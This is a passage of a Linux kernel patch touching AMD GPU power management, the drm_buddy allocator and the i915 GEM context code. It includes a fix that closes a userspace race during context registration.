+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_object.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_object.c
+@@ -468,8 +468,9 @@ static bool amdgpu_bo_validate_size(struct amdgpu_device *adev,
+ 	return true;
+ 
+ fail:
+-	DRM_DEBUG("BO size %lu > total memory in domain: %llu\n", size,
+-		  man->size);
++	if (man)
++		DRM_DEBUG("BO size %lu > total memory in domain: %llu\n", size,
++			  man->size);
+ 	return false;
+ }
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_vram_mgr.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_vram_mgr.c
+index 80dd1343594c7..75c80c557b6ec 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_vram_mgr.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_vram_mgr.c
+@@ -882,7 +882,7 @@ void amdgpu_vram_mgr_fini(struct amdgpu_device *adev)
+ 		kfree(rsv);
+ 
+ 	list_for_each_entry_safe(rsv, temp, &mgr->reserved_pages, blocks) {
+-		drm_buddy_free_list(&mgr->mm, &rsv->blocks);
++		drm_buddy_free_list(&mgr->mm, &rsv->allocated);
+ 		kfree(rsv);
+ 	}
+ 	drm_buddy_fini(&mgr->mm);
+diff --git a/drivers/gpu/drm/amd/amdgpu/soc21.c b/drivers/gpu/drm/amd/amdgpu/soc21.c
+index 8b297ade69a24..909cf9f220c19 100644
+--- a/drivers/gpu/drm/amd/amdgpu/soc21.c
++++ b/drivers/gpu/drm/amd/amdgpu/soc21.c
+@@ -322,6 +322,7 @@ soc21_asic_reset_method(struct amdgpu_device *adev)
+ 	switch (adev->ip_versions[MP1_HWIP][0]) {
+ 	case IP_VERSION(13, 0, 0):
+ 	case IP_VERSION(13, 0, 7):
++	case IP_VERSION(13, 0, 10):
+ 		return AMD_RESET_METHOD_MODE1;
+ 	case IP_VERSION(13, 0, 4):
+ 		return AMD_RESET_METHOD_MODE2;
+@@ -652,6 +653,16 @@ static int soc21_common_early_init(void *handle)
+ 		}
+ 		adev->external_rev_id = adev->rev_id + 0x20;
+ 		break;
++	case IP_VERSION(11, 0, 4):
++		adev->cg_flags = AMD_CG_SUPPORT_VCN_MGCG |
++			AMD_CG_SUPPORT_JPEG_MGCG;
++		adev->pg_flags = AMD_PG_SUPPORT_VCN |
++			AMD_PG_SUPPORT_VCN_DPG |
++			AMD_PG_SUPPORT_GFX_PG |
++			AMD_PG_SUPPORT_JPEG;
++		adev->external_rev_id = adev->rev_id + 0x1;
++		break;
++
+ 	default:
+ 		/* FIXME: not supported yet */
+ 		return -EINVAL;
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.c b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.c
+index 33ab6fdc36175..9919c39f7ea03 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.c
+@@ -1919,8 +1919,9 @@ int dcn32_populate_dml_pipes_from_context(
+ 		timing = &pipe->stream->timing;
+ 
+ 		pipes[pipe_cnt].pipe.src.gpuvm = true;
+-		pipes[pipe_cnt].pipe.src.dcc_fraction_of_zs_req_luma = 0;
+-		pipes[pipe_cnt].pipe.src.dcc_fraction_of_zs_req_chroma = 0;
++		DC_FP_START();
++		dcn32_zero_pipe_dcc_fraction(pipes, pipe_cnt);
++		DC_FP_END();
+ 		pipes[pipe_cnt].pipe.dest.vfront_porch = timing->v_front_porch;
+ 		pipes[pipe_cnt].pipe.src.gpuvm_min_page_size_kbytes = 256; // according to spreadsheet
+ 		pipes[pipe_cnt].pipe.src.unbounded_req_mode = false;
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn32/dcn32_fpu.c b/drivers/gpu/drm/amd/display/dc/dml/dcn32/dcn32_fpu.c
+index d1bf49d207de4..d90216d2fe3a8 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn32/dcn32_fpu.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn32/dcn32_fpu.c
+@@ -2546,3 +2546,11 @@ void dcn32_update_bw_bounding_box_fpu(struct dc *dc, struct clk_bw_params *bw_pa
+ 	}
+ }
+ 
++void dcn32_zero_pipe_dcc_fraction(display_e2e_pipe_params_st *pipes,
++				  int pipe_cnt)
++{
++	dc_assert_fp_enabled();
++
++	pipes[pipe_cnt].pipe.src.dcc_fraction_of_zs_req_luma = 0;
++	pipes[pipe_cnt].pipe.src.dcc_fraction_of_zs_req_chroma = 0;
++}
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn32/dcn32_fpu.h b/drivers/gpu/drm/amd/display/dc/dml/dcn32/dcn32_fpu.h
+index 3a3dc2ce4c739..ab010e7e840b8 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn32/dcn32_fpu.h
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn32/dcn32_fpu.h
+@@ -73,4 +73,7 @@ int dcn32_find_dummy_latency_index_for_fw_based_mclk_switch(struct dc *dc,
+ 
+ void dcn32_patch_dpm_table(struct clk_bw_params *bw_params);
+ 
++void dcn32_zero_pipe_dcc_fraction(display_e2e_pipe_params_st *pipes,
++				  int pipe_cnt);
++
+ #endif
+diff --git a/drivers/gpu/drm/amd/pm/powerplay/hwmgr/vega10_thermal.c b/drivers/gpu/drm/amd/pm/powerplay/hwmgr/vega10_thermal.c
+index dad3e3741a4e8..190af79f3236f 100644
+--- a/drivers/gpu/drm/amd/pm/powerplay/hwmgr/vega10_thermal.c
++++ b/drivers/gpu/drm/amd/pm/powerplay/hwmgr/vega10_thermal.c
+@@ -67,22 +67,21 @@ int vega10_fan_ctrl_get_fan_speed_info(struct pp_hwmgr *hwmgr,
+ int vega10_fan_ctrl_get_fan_speed_pwm(struct pp_hwmgr *hwmgr,
+ 		uint32_t *speed)
+ {
+-	uint32_t current_rpm;
+-	uint32_t percent = 0;
+-
+-	if (hwmgr->thermal_controller.fanInfo.bNoFan)
+-		return 0;
++	struct amdgpu_device *adev = hwmgr->adev;
++	uint32_t duty100, duty;
++	uint64_t tmp64;
+ 
+-	if (vega10_get_current_rpm(hwmgr, &current_rpm))
+-		return -1;
++	duty100 = REG_GET_FIELD(RREG32_SOC15(THM, 0, mmCG_FDO_CTRL1),
++				CG_FDO_CTRL1, FMAX_DUTY100);
++	duty = REG_GET_FIELD(RREG32_SOC15(THM, 0, mmCG_THERMAL_STATUS),
++				CG_THERMAL_STATUS, FDO_PWM_DUTY);
+ 
+-	if (hwmgr->thermal_controller.
+-			advanceFanControlParameters.usMaxFanRPM != 0)
+-		percent = current_rpm * 255 /
+-			hwmgr->thermal_controller.
+-			advanceFanControlParameters.usMaxFanRPM;
++	if (!duty100)
++		return -EINVAL;
+ 
+-	*speed = MIN(percent, 255);
++	tmp64 = (uint64_t)duty * 255;
++	do_div(tmp64, duty100);
++	*speed = MIN((uint32_t)tmp64, 255);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/inc/amdgpu_smu.h b/drivers/gpu/drm/amd/pm/swsmu/inc/amdgpu_smu.h
+index f816b1dd110ee..44bbf17e4bef1 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/inc/amdgpu_smu.h
++++ b/drivers/gpu/drm/amd/pm/swsmu/inc/amdgpu_smu.h
+@@ -568,6 +568,10 @@ struct smu_context
+ 	u32 param_reg;
+ 	u32 msg_reg;
+ 	u32 resp_reg;
++
++	u32 debug_param_reg;
++	u32 debug_msg_reg;
++	u32 debug_resp_reg;
+ };
+ 
+ struct i2c_adapter;
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/inc/pmfw_if/smu_v13_0_0_ppsmc.h b/drivers/gpu/drm/amd/pm/swsmu/inc/pmfw_if/smu_v13_0_0_ppsmc.h
+index 9ebb8f39732a0..8b8266890a100 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/inc/pmfw_if/smu_v13_0_0_ppsmc.h
++++ b/drivers/gpu/drm/amd/pm/swsmu/inc/pmfw_if/smu_v13_0_0_ppsmc.h
+@@ -131,7 +131,13 @@
+ #define PPSMC_MSG_EnableAudioStutterWA           0x44
+ #define PPSMC_MSG_PowerUpUmsch                   0x45
+ #define PPSMC_MSG_PowerDownUmsch                 0x46
+-#define PPSMC_Message_Count                      0x47
++#define PPSMC_MSG_SetDcsArch                     0x47
++#define PPSMC_MSG_TriggerVFFLR                   0x48
++#define PPSMC_MSG_SetNumBadMemoryPagesRetired    0x49
++#define PPSMC_MSG_SetBadMemoryPagesRetiredFlagsPerChannel 0x4A
++#define PPSMC_MSG_SetPriorityDeltaGain           0x4B
++#define PPSMC_MSG_AllowIHHostInterrupt           0x4C
++#define PPSMC_Message_Count                      0x4D
+ 
+ //Debug Dump Message
+ #define DEBUGSMC_MSG_TestMessage                    0x1
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/inc/smu_types.h b/drivers/gpu/drm/amd/pm/swsmu/inc/smu_types.h
+index 58098b82df660..4180c71d930f1 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/inc/smu_types.h
++++ b/drivers/gpu/drm/amd/pm/swsmu/inc/smu_types.h
+@@ -239,7 +239,10 @@
+ 	__SMU_DUMMY_MAP(DriverMode2Reset), \
+ 	__SMU_DUMMY_MAP(GetGfxOffStatus),		 \
+ 	__SMU_DUMMY_MAP(GetGfxOffEntryCount),		 \
+-	__SMU_DUMMY_MAP(LogGfxOffResidency),
++	__SMU_DUMMY_MAP(LogGfxOffResidency),			\
++	__SMU_DUMMY_MAP(SetNumBadMemoryPagesRetired),		\
++	__SMU_DUMMY_MAP(SetBadMemoryPagesRetiredFlagsPerChannel), \
++	__SMU_DUMMY_MAP(AllowGpo),
+ 
+ #undef __SMU_DUMMY_MAP
+ #define __SMU_DUMMY_MAP(type)	SMU_MSG_##type
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/inc/smu_v13_0.h b/drivers/gpu/drm/amd/pm/swsmu/inc/smu_v13_0.h
+index a9122b3b15322..e8c6febb8b64e 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/inc/smu_v13_0.h
++++ b/drivers/gpu/drm/amd/pm/swsmu/inc/smu_v13_0.h
+@@ -273,6 +273,9 @@ int smu_v13_0_init_pptable_microcode(struct smu_context *smu);
+ 
+ int smu_v13_0_run_btc(struct smu_context *smu);
+ 
++int smu_v13_0_gpo_control(struct smu_context *smu,
++			  bool enablement);
++
+ int smu_v13_0_deep_sleep_control(struct smu_context *smu,
+ 				 bool enablement);
+ 
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0.c b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0.c
+index 8e4830a311bde..9f9f64c5cdd88 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0.c
+@@ -1258,7 +1258,8 @@ int smu_v13_0_set_fan_speed_rpm(struct smu_context *smu,
+ 				uint32_t speed)
+ {
+ 	struct amdgpu_device *adev = smu->adev;
+-	uint32_t tach_period, crystal_clock_freq;
++	uint32_t crystal_clock_freq = 2500;
++	uint32_t tach_period;
+ 	int ret;
+ 
+ 	if (!speed)
+@@ -1268,7 +1269,6 @@ int smu_v13_0_set_fan_speed_rpm(struct smu_context *smu,
+ 	if (ret)
+ 		return ret;
+ 
+-	crystal_clock_freq = amdgpu_asic_get_xclk(adev);
+ 	tach_period = 60 * crystal_clock_freq * 10000 / (8 * speed);
+ 	WREG32_SOC15(THM, 0, regCG_TACH_CTRL,
+ 		     REG_SET_FIELD(RREG32_SOC15(THM, 0, regCG_TACH_CTRL),
+@@ -2148,6 +2148,21 @@ int smu_v13_0_run_btc(struct smu_context *smu)
+ 	return res;
+ }
+ 
++int smu_v13_0_gpo_control(struct smu_context *smu,
++			  bool enablement)
++{
++	int res;
++
++	res = smu_cmn_send_smc_msg_with_param(smu,
++					      SMU_MSG_AllowGpo,
++					      enablement ? 1 : 0,
++					      NULL);
++	if (res)
++		dev_err(smu->adev->dev, "SetGpoAllow %d failed!\n", enablement);
++
++	return res;
++}
++
+ int smu_v13_0_deep_sleep_control(struct smu_context *smu,
+ 				 bool enablement)
+ {
+@@ -2249,6 +2264,10 @@ bool smu_v13_0_baco_is_support(struct smu_context *smu)
+ 	    !smu_baco->platform_support)
+ 		return false;
+ 
++	/* return true if ASIC is in BACO state already */
++	if (smu_v13_0_baco_get_state(smu) == SMU_BACO_STATE_ENTER)
++		return true;
++
+ 	if (smu_cmn_feature_is_supported(smu, SMU_FEATURE_BACO_BIT) &&
+ 	    !smu_cmn_feature_is_enabled(smu, SMU_FEATURE_BACO_BIT))
+ 		return false;
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_0_ppt.c b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_0_ppt.c
+index b8430601304f0..4c20d17e7416e 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_0_ppt.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_0_ppt.c
+@@ -70,6 +70,26 @@
+ 
+ #define MP0_MP1_DATA_REGION_SIZE_COMBOPPTABLE	0x4000
+ 
++#define mmMP1_SMN_C2PMSG_66                                                                            0x0282
++#define mmMP1_SMN_C2PMSG_66_BASE_IDX                                                                   0
++
++#define mmMP1_SMN_C2PMSG_82                                                                            0x0292
++#define mmMP1_SMN_C2PMSG_82_BASE_IDX                                                                   0
++
++#define mmMP1_SMN_C2PMSG_90                                                                            0x029a
++#define mmMP1_SMN_C2PMSG_90_BASE_IDX                                                                   0
++
++#define mmMP1_SMN_C2PMSG_75                                                                            0x028b
++#define mmMP1_SMN_C2PMSG_75_BASE_IDX                                                                   0
++
++#define mmMP1_SMN_C2PMSG_53                                                                            0x0275
++#define mmMP1_SMN_C2PMSG_53_BASE_IDX                                                                   0
++
++#define mmMP1_SMN_C2PMSG_54                                                                            0x0276
++#define mmMP1_SMN_C2PMSG_54_BASE_IDX                                                                   0
++
++#define DEBUGSMC_MSG_Mode1Reset	2
++
+ static struct cmn2asic_msg_mapping smu_v13_0_0_message_map[SMU_MSG_MAX_COUNT] = {
+ 	MSG_MAP(TestMessage,			PPSMC_MSG_TestMessage,                 1),
+ 	MSG_MAP(GetSmuVersion,			PPSMC_MSG_GetSmuVersion,               1),
+@@ -121,6 +141,10 @@ static struct cmn2asic_msg_mapping smu_v13_0_0_message_map[SMU_MSG_MAX_COUNT] =
+ 	MSG_MAP(PrepareMp1ForUnload,		PPSMC_MSG_PrepareMp1ForUnload,         0),
+ 	MSG_MAP(DFCstateControl,		PPSMC_MSG_SetExternalClientDfCstateAllow, 0),
+ 	MSG_MAP(ArmD3,				PPSMC_MSG_ArmD3,                       0),
++	MSG_MAP(SetNumBadMemoryPagesRetired,	PPSMC_MSG_SetNumBadMemoryPagesRetired,   0),
++	MSG_MAP(SetBadMemoryPagesRetiredFlagsPerChannel,
++			    PPSMC_MSG_SetBadMemoryPagesRetiredFlagsPerChannel,   0),
++	MSG_MAP(AllowGpo,			PPSMC_MSG_SetGpoAllow,           0),
+ };
+ 
+ static struct cmn2asic_mapping smu_v13_0_0_clk_map[SMU_CLK_COUNT] = {
+@@ -189,6 +213,7 @@ static struct cmn2asic_mapping smu_v13_0_0_feature_mask_map[SMU_FEATURE_COUNT] =
+ 	FEA_MAP(SOC_PCC),
+ 	[SMU_FEATURE_DPM_VCLK_BIT] = {1, FEATURE_MM_DPM_BIT},
+ 	[SMU_FEATURE_DPM_DCLK_BIT] = {1, FEATURE_MM_DPM_BIT},
++	[SMU_FEATURE_PPT_BIT] = {1, FEATURE_THROTTLERS_BIT},
+ };
+ 
+ static struct cmn2asic_mapping smu_v13_0_0_table_map[SMU_TABLE_COUNT] = {
+@@ -1878,6 +1903,69 @@ static int smu_v13_0_0_set_df_cstate(struct smu_context *smu,
+ 					       NULL);
+ }
+ 
++static int smu_v13_0_0_mode1_reset(struct smu_context *smu)
++{
++	int ret;
++	struct amdgpu_device *adev = smu->adev;
++
++	if (adev->ip_versions[MP1_HWIP][0] == IP_VERSION(13, 0, 10))
++		ret = smu_cmn_send_debug_smc_msg(smu, DEBUGSMC_MSG_Mode1Reset);
++	else
++		ret = smu_cmn_send_smc_msg(smu, SMU_MSG_Mode1Reset, NULL);
++
++	if (!ret)
++		msleep(SMU13_MODE1_RESET_WAIT_TIME_IN_MS);
++
++	return ret;
++}
++
++static void smu_v13_0_0_set_smu_mailbox_registers(struct smu_context *smu)
++{
++	struct amdgpu_device *adev = smu->adev;
++
++	smu->param_reg = SOC15_REG_OFFSET(MP1, 0, mmMP1_SMN_C2PMSG_82);
++	smu->msg_reg = SOC15_REG_OFFSET(MP1, 0, mmMP1_SMN_C2PMSG_66);
++	smu->resp_reg = SOC15_REG_OFFSET(MP1, 0, mmMP1_SMN_C2PMSG_90);
++
++	smu->debug_param_reg = SOC15_REG_OFFSET(MP1, 0, mmMP1_SMN_C2PMSG_53);
++	smu->debug_msg_reg = SOC15_REG_OFFSET(MP1, 0, mmMP1_SMN_C2PMSG_75);
++	smu->debug_resp_reg = SOC15_REG_OFFSET(MP1, 0, mmMP1_SMN_C2PMSG_54);
++}
++
++static int smu_v13_0_0_smu_send_bad_mem_page_num(struct smu_context *smu,
++		uint32_t size)
++{
++	int ret = 0;
++
++	/* message SMU to update the bad page number on SMUBUS */
++	ret = smu_cmn_send_smc_msg_with_param(smu,
++					  SMU_MSG_SetNumBadMemoryPagesRetired,
++					  size, NULL);
++	if (ret)
++		dev_err(smu->adev->dev,
++			  "[%s] failed to message SMU to update bad memory pages number\n",
++			  __func__);
++
++	return ret;
++}
++
++static int smu_v13_0_0_send_bad_mem_channel_flag(struct smu_context *smu,
++		uint32_t size)
++{
++	int ret = 0;
++
++	/* message SMU to update the bad channel info on SMUBUS */
++	ret = smu_cmn_send_smc_msg_with_param(smu,
++				  SMU_MSG_SetBadMemoryPagesRetiredFlagsPerChannel,
++				  size, NULL);
++	if (ret)
++		dev_err(smu->adev->dev,
++			  "[%s] failed to message SMU to update bad memory pages channel info\n",
++			  __func__);
++
++	return ret;
++}
++
+ static const struct pptable_funcs smu_v13_0_0_ppt_funcs = {
+ 	.get_allowed_feature_mask = smu_v13_0_0_get_allowed_feature_mask,
+ 	.set_default_dpm_table = smu_v13_0_0_set_default_dpm_table,
+@@ -1945,9 +2033,12 @@ static const struct pptable_funcs smu_v13_0_0_ppt_funcs = {
+ 	.baco_enter = smu_v13_0_0_baco_enter,
+ 	.baco_exit = smu_v13_0_0_baco_exit,
+ 	.mode1_reset_is_support = smu_v13_0_0_is_mode1_reset_supported,
+-	.mode1_reset = smu_v13_0_mode1_reset,
++	.mode1_reset = smu_v13_0_0_mode1_reset,
+ 	.set_mp1_state = smu_v13_0_0_set_mp1_state,
+ 	.set_df_cstate = smu_v13_0_0_set_df_cstate,
++	.send_hbm_bad_pages_num = smu_v13_0_0_smu_send_bad_mem_page_num,
++	.send_hbm_bad_channel_flag = smu_v13_0_0_send_bad_mem_channel_flag,
++	.gpo_control = smu_v13_0_gpo_control,
+ };
+ 
+ void smu_v13_0_0_set_ppt_funcs(struct smu_context *smu)
+@@ -1959,5 +2050,5 @@ void smu_v13_0_0_set_ppt_funcs(struct smu_context *smu)
+ 	smu->table_map = smu_v13_0_0_table_map;
+ 	smu->pwr_src_map = smu_v13_0_0_pwr_src_map;
+ 	smu->workload_map = smu_v13_0_0_workload_map;
+-	smu_v13_0_set_smu_mailbox_registers(smu);
++	smu_v13_0_0_set_smu_mailbox_registers(smu);
+ }
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_7_ppt.c b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_7_ppt.c
+index 222924363a681..eea06939e7da1 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_7_ppt.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_7_ppt.c
+@@ -123,6 +123,7 @@ static struct cmn2asic_msg_mapping smu_v13_0_7_message_map[SMU_MSG_MAX_COUNT] =
+ 	MSG_MAP(SetMGpuFanBoostLimitRpm,	PPSMC_MSG_SetMGpuFanBoostLimitRpm,     0),
+ 	MSG_MAP(DFCstateControl,		PPSMC_MSG_SetExternalClientDfCstateAllow, 0),
+ 	MSG_MAP(ArmD3,				PPSMC_MSG_ArmD3,                       0),
++	MSG_MAP(AllowGpo,			PPSMC_MSG_SetGpoAllow,           0),
+ };
+ 
+ static struct cmn2asic_mapping smu_v13_0_7_clk_map[SMU_CLK_COUNT] = {
+@@ -191,6 +192,7 @@ static struct cmn2asic_mapping smu_v13_0_7_feature_mask_map[SMU_FEATURE_COUNT] =
+ 	FEA_MAP(SOC_PCC),
+ 	[SMU_FEATURE_DPM_VCLK_BIT] = {1, FEATURE_MM_DPM_BIT},
+ 	[SMU_FEATURE_DPM_DCLK_BIT] = {1, FEATURE_MM_DPM_BIT},
++	[SMU_FEATURE_PPT_BIT] = {1, FEATURE_THROTTLERS_BIT},
+ };
+ 
+ static struct cmn2asic_mapping smu_v13_0_7_table_map[SMU_TABLE_COUNT] = {
+@@ -1711,6 +1713,7 @@ static const struct pptable_funcs smu_v13_0_7_ppt_funcs = {
+ 	.mode1_reset = smu_v13_0_mode1_reset,
+ 	.set_mp1_state = smu_v13_0_7_set_mp1_state,
+ 	.set_df_cstate = smu_v13_0_7_set_df_cstate,
++	.gpo_control = smu_v13_0_gpo_control,
+ };
+ 
+ void smu_v13_0_7_set_ppt_funcs(struct smu_context *smu)
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu_cmn.c b/drivers/gpu/drm/amd/pm/swsmu/smu_cmn.c
+index e4f8f90ac5aa0..768b6e7dbd771 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu_cmn.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu_cmn.c
+@@ -233,6 +233,18 @@ static void __smu_cmn_send_msg(struct smu_context *smu,
+ 	WREG32(smu->msg_reg, msg);
+ }
+ 
++static int __smu_cmn_send_debug_msg(struct smu_context *smu,
++			       u32 msg,
++			       u32 param)
++{
++	struct amdgpu_device *adev = smu->adev;
++
++	WREG32(smu->debug_param_reg, param);
++	WREG32(smu->debug_msg_reg, msg);
++	WREG32(smu->debug_resp_reg, 0);
++
++	return 0;
++}
+ /**
+  * smu_cmn_send_msg_without_waiting -- send the message; don't wait for status
+  * @smu: pointer to an SMU context
+@@ -386,6 +398,12 @@ int smu_cmn_send_smc_msg(struct smu_context *smu,
+ 					       read_arg);
+ }
+ 
++int smu_cmn_send_debug_smc_msg(struct smu_context *smu,
++			 uint32_t msg)
++{
++	return __smu_cmn_send_debug_msg(smu, msg, 0);
++}
++
+ int smu_cmn_to_asic_specific_index(struct smu_context *smu,
+ 				   enum smu_cmn2asic_mapping_type type,
+ 				   uint32_t index)
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu_cmn.h b/drivers/gpu/drm/amd/pm/swsmu/smu_cmn.h
+index 1526ce09c399b..f82cf76dd3a47 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu_cmn.h
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu_cmn.h
+@@ -42,6 +42,9 @@ int smu_cmn_send_smc_msg(struct smu_context *smu,
+ 			 enum smu_message_type msg,
+ 			 uint32_t *read_arg);
+ 
++int smu_cmn_send_debug_smc_msg(struct smu_context *smu,
++			 uint32_t msg);
++
+ int smu_cmn_wait_for_response(struct smu_context *smu);
+ 
+ int smu_cmn_to_asic_specific_index(struct smu_context *smu,
+diff --git a/drivers/gpu/drm/drm_buddy.c b/drivers/gpu/drm/drm_buddy.c
+index 11bb593994718..3d1f50f481cfd 100644
+--- a/drivers/gpu/drm/drm_buddy.c
++++ b/drivers/gpu/drm/drm_buddy.c
+@@ -38,6 +38,25 @@ static void drm_block_free(struct drm_buddy *mm,
+ 	kmem_cache_free(slab_blocks, block);
+ }
+ 
++static void list_insert_sorted(struct drm_buddy *mm,
++			       struct drm_buddy_block *block)
++{
++	struct drm_buddy_block *node;
++	struct list_head *head;
++
++	head = &mm->free_list[drm_buddy_block_order(block)];
++	if (list_empty(head)) {
++		list_add(&block->link, head);
++		return;
++	}
++
++	list_for_each_entry(node, head, link)
++		if (drm_buddy_block_offset(block) < drm_buddy_block_offset(node))
++			break;
++
++	__list_add(&block->link, node->link.prev, &node->link);
++}
++
+ static void mark_allocated(struct drm_buddy_block *block)
+ {
+ 	block->header &= ~DRM_BUDDY_HEADER_STATE;
+@@ -52,8 +71,7 @@ static void mark_free(struct drm_buddy *mm,
+ 	block->header &= ~DRM_BUDDY_HEADER_STATE;
+ 	block->header |= DRM_BUDDY_FREE;
+ 
+-	list_add(&block->link,
+-		 &mm->free_list[drm_buddy_block_order(block)]);
++	list_insert_sorted(mm, block);
+ }
+ 
+ static void mark_split(struct drm_buddy_block *block)
+@@ -387,20 +405,26 @@ err_undo:
+ }
+ 
+ static struct drm_buddy_block *
+-get_maxblock(struct list_head *head)
++get_maxblock(struct drm_buddy *mm, unsigned int order)
+ {
+ 	struct drm_buddy_block *max_block = NULL, *node;
++	unsigned int i;
+ 
+-	max_block = list_first_entry_or_null(head,
+-					     struct drm_buddy_block,
+-					     link);
+-	if (!max_block)
+-		return NULL;
++	for (i = order; i <= mm->max_order; ++i) {
++		if (!list_empty(&mm->free_list[i])) {
++			node = list_last_entry(&mm->free_list[i],
++					       struct drm_buddy_block,
++					       link);
++			if (!max_block) {
++				max_block = node;
++				continue;
++			}
+ 
+-	list_for_each_entry(node, head, link) {
+-		if (drm_buddy_block_offset(node) >
+-		    drm_buddy_block_offset(max_block))
+-			max_block = node;
++			if (drm_buddy_block_offset(node) >
++			    drm_buddy_block_offset(max_block)) {
++				max_block = node;
++			}
++		}
+ 	}
+ 
+ 	return max_block;
+@@ -412,20 +436,23 @@ alloc_from_freelist(struct drm_buddy *mm,
+ 		    unsigned long flags)
+ {
+ 	struct drm_buddy_block *block = NULL;
+-	unsigned int i;
++	unsigned int tmp;
+ 	int err;
+ 
+-	for (i = order; i <= mm->max_order; ++i) {
+-		if (flags & DRM_BUDDY_TOPDOWN_ALLOCATION) {
+-			block = get_maxblock(&mm->free_list[i]);
+-			if (block)
+-				break;
+-		} else {
+-			block = list_first_entry_or_null(&mm->free_list[i],
+-							 struct drm_buddy_block,
+-							 link);
+-			if (block)
+-				break;
++	if (flags & DRM_BUDDY_TOPDOWN_ALLOCATION) {
++		block = get_maxblock(mm, order);
++		if (block)
++			/* Store the obtained block order */
++			tmp = drm_buddy_block_order(block);
++	} else {
++		for (tmp = order; tmp <= mm->max_order; ++tmp) {
++			if (!list_empty(&mm->free_list[tmp])) {
++				block = list_last_entry(&mm->free_list[tmp],
++							struct drm_buddy_block,
++							link);
++				if (block)
++					break;
++			}
+ 		}
+ 	}
+ 
+@@ -434,18 +461,18 @@ alloc_from_freelist(struct drm_buddy *mm,
+ 
+ 	BUG_ON(!drm_buddy_block_is_free(block));
+ 
+-	while (i != order) {
++	while (tmp != order) {
+ 		err = split_block(mm, block);
+ 		if (unlikely(err))
+ 			goto err_undo;
+ 
+ 		block = block->right;
+-		i--;
++		tmp--;
+ 	}
+ 	return block;
+ 
+ err_undo:
+-	if (i != order)
++	if (tmp != order)
+ 		__drm_buddy_free(mm, block);
+ 	return ERR_PTR(err);
+ }
+diff --git a/drivers/gpu/drm/i915/gem/i915_gem_context.c b/drivers/gpu/drm/i915/gem/i915_gem_context.c
+index 1e29b1e6d1868..2353723ca1bd2 100644
+--- a/drivers/gpu/drm/i915/gem/i915_gem_context.c
++++ b/drivers/gpu/drm/i915/gem/i915_gem_context.c
+@@ -1688,6 +1688,10 @@ void i915_gem_init__contexts(struct drm_i915_private *i915)
+ 	init_contexts(&i915->gem.contexts);
+ }
+ 
++/*
++ * Note that this implicitly consumes the ctx reference, by placing
++ * the ctx in the context_xa.
++ */
+ static void gem_context_register(struct i915_gem_context *ctx,
+ 				 struct drm_i915_file_private *fpriv,
+ 				 u32 id)
+@@ -1703,10 +1707,6 @@ static void gem_context_register(struct i915_gem_context *ctx,
+ 	snprintf(ctx->name, sizeof(ctx->name), "%s[%d]",
+ 		 current->comm, pid_nr(ctx->pid));
+ 
+-	/* And finally expose ourselves to userspace via the idr */
+-	old = xa_store(&fpriv->context_xa, id, ctx, GFP_KERNEL);
+-	WARN_ON(old);
+-
+ 	spin_lock(&ctx->client->ctx_lock);
+ 	list_add_tail_rcu(&ctx->client_link, &ctx->client->ctx_list);
+ 	spin_unlock(&ctx->client->ctx_lock);
+@@ -1714,6 +1714,10 @@ static void gem_context_register(struct i915_gem_context *ctx,
+ 	spin_lock(&i915->gem.contexts.lock);
+ 	list_add_tail(&ctx->link, &i915->gem.contexts.list);
+ 	spin_unlock(&i915->gem.contexts.lock);
++
++	/* And finally expose ourselves to userspace via the idr */
++	old = xa_store(&fpriv->context_xa, id, ctx, GFP_KERNEL);
++	WARN_ON(old);
+ }
+ 
+ int i915_gem_context_open(struct drm_i915_private *i915,
+@@ -2199,14 +2203,22 @@ finalize_create_context_locked(struct drm_i915_file_private *file_priv,
+ 	if (IS_ERR(ctx))
+ 		return ctx;
+ 
++	/*
++	 * One for the xarray and one for the caller.  We need to grab
++	 * the reference *prior* to making the ctx visble to userspace
++	 * in gem_context_register(), as at any point after that
++	 * userspace can try to race us with another thread destroying
++	 * the context under our feet.
++	 */
++	i915_gem_context_get(ctx);
++
+ 	gem_context_register(ctx, file_priv, id);
+ 
